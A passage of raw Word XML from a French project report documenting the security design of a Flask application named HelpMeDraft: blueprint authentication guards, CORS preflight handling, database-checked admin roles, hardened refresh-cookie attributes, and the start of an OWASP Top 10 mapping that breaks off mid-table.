      </w:r>
      <w:r>
        <w:t xml:space="preserve">envoyé par le client serait ignoré.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="105"/>
    <w:bookmarkStart w:id="106" w:name="Xd53d5d2a1fd5bc2a7aad2538fb695d10827e392"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Protection d'un blueprint entier, et le cas du préflight CORS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Plutôt que de décorer chaque vue, les blueprints protégés déclarent un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">before_request</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">unique :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="2066351" cy="688784"/>
            <wp:docPr id="52" name="Picture 52"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="a8c81afa520b-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId67"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2066351" cy="688784"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Une route oubliée reste ainsi protégée : c'est le blueprint qui porte la garde, pas le développeur qui doit y penser. L'exception sur</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">OPTIONS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mérite d'être justifiée plutôt que subie : le navigateur envoie une requête de préflight sans en-tête d'authentification avant toute requête authentifiée inter-origine. La refuser par</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">401</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">casse l'application entière, avec un message d'erreur qui pointe vers le CORS et non vers l'authentification. La laisser passer est sans conséquence, puisqu'une réponse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">OPTIONS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ne contient que des en-têtes de permission.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>Le back-office ajoute une seconde couche, et c'est ici que se matérialise la décision du § 5.2 :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="3899796" cy="1489450"/>
            <wp:docPr id="53" name="Picture 53"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="ee3a00f3bfe2-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId68"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3899796" cy="1489450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="3899796" cy="1489450"/>
            <wp:docPr id="54" name="Picture 54"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="ee3a00f3bfe2-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId68"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3899796" cy="1489450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Le rôle est relu en base, pas lu dans le jeton.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Le JWT ne porte que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sub</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: le rôle n'y figure pas du tout, ce qui rend l'oubli impossible. Une rétrogradation prend donc effet à l'appel suivant, sans attendre l'expiration de l'access token. Le coût est une requête supplémentaire par appel au back-office — négligeable sur des écrans d'administration peu fréquentés.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Le</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">403</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">est ici volontaire, alors que les documents renvoient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">404</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">La différence est cohérente : l'existence de la route</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">n'est pas un secret, contrairement à l'existence d'un document donné. Il n'y a rien à énumérer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deux garde-fous complètent le back-office, contre l'erreur plutôt que contre l'attaque :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4816519" cy="588552"/>
            <wp:docPr id="55" name="Picture 55"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="63ad562392ca-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId69"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4816519" cy="588552"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le premier évite qu'un unique administrateur se verrouille hors du back-office, situation dont on ne sort qu'en modifiant la base à la main. Le second évite une suppression en cascade de son propre compte depuis l'écran d'administration.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="106"/>
    <w:bookmarkStart w:id="107" w:name="X2a5250f812751169ac759f80b49f820304dbfc9"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>La pose du cookie de refresh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un seul point du code pose ce cookie, appelé par</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/auth/login</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">et</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/auth/refresh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="2645360" cy="1088560"/>
            <wp:docPr id="56" name="Picture 56"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="105aa06d1dd2-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId70"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2645360" cy="1088560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chacun des cinq attributs répond à une menace distincte.</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Attribut</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Menace couverte</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">httponly=True</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Un XSS ne peut pas lire le jeton par</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">document.cookie</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>— il reste inaccessible même si l'assainissement de l'aperçu échouait (§ 7.1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">secure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Le jeton ne transite jamais sur HTTP en clair hors développement (§ 6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t>samesite="Strict"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Le cookie n'est jamais envoyé sur une requête inter-site, y compris une navigation top-level que Lax laisserait passer : c'est l'atténuation CSRF principale du projet (§ 8)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">path="/auth"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Le cookie n'accompagne que les routes d'authentification, pas les appels aux documents ni à l'IA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">max_age</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Le cookie disparaît du navigateur même si la session serveur n'est pas purgée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">centralisation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>est elle-même la mesure la plus utile : trois routes posent ou suppriment ce cookie, et un attribut oublié à un seul endroit suffirait à annuler la protection. Un point unique rend l'oubli impossible et rend la vérification (cas TS-08, § 9) simple à mener.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="107"/>
    <w:bookmarkStart w:id="108" w:name="Xe5d961f1930ad3cff53f505cbb7c8be059ea4dc"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Configuration et fabrique d'application</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deux composants transverses sont présentés ailleurs, pour rester au plus près de leur justification : la configuration en échec rapide sans</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">JWT_SECRET_KEY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">et le pilotage de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">COOKIE_SECURE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">par</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">APP_ENV</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(§ 6), et la fabrique</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">create_app()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">avec l'origine CORS explicite et la normalisation des erreurs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">429</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(§ 6). Le code complet de la configuration figure en annexe § 12.5.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="108"/>
    <w:bookmarkEnd w:id="109"/>
    <w:bookmarkStart w:id="110" w:name="X8b64aa56fe23a9fa8389e2f8e03e21ba5ed39cb"/>
    <w:p w14:paraId="5BE996F0" w14:textId="7FF08B12" w:rsidR="003A2DEC" w:rsidRPr="00B1648B" w:rsidRDefault="00690DDD" w:rsidP="003A2DEC">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>La</w:t>
      </w:r>
      <w:r w:rsidR="003A2DEC" w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> présentation d’éléments de sécurité de l’application </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Démarche</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La sécurité n'a pas été traitée comme une étape de fin de projet mais comme une contrainte de conception, pour une raison pratique : la plupart des mesures présentées ici — le filtrage par propriétaire dans le</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, le stockage d'empreintes, le refus de démarrer sans clé — sont des choix de structure. Les ajouter après coup aurait demandé de réécrire les couches concernées.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La grille de lecture retenue est l'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top 10 (2021)</w:t>
      </w:r>
      <w:r>
        <w:t>, confrontée aux exigences du cahier des charges (§ 2) et aux recommandations de l'ANSSI. Le tableau ci-dessous relie chaque catégorie à sa traduction dans le projet.</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Catégorie OWASP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Traitement dans HelpMeDraft</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Section</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A01 Contrôle d'accès défaillant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Propriété dans la clause</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">WHERE</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">de chaque requête, rôle relu en base, garde de blueprint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>§ 8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A02 Défaillances cryptographiques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">bcrypt salé pour les mots de passe, SHA-256 pour les jetons, aucun secret en clair en base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>§ 8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A03 Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Requêtes paramétrées par l'ORM sans exception ; assainissement du HTML rendu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>§ 8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A04 Conception non sécurisée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Quota serveur, journalisation systématique, aucune application automatique des sorties du modèle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>§ 8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A05 Mauvaise configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Échec rapide sans</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
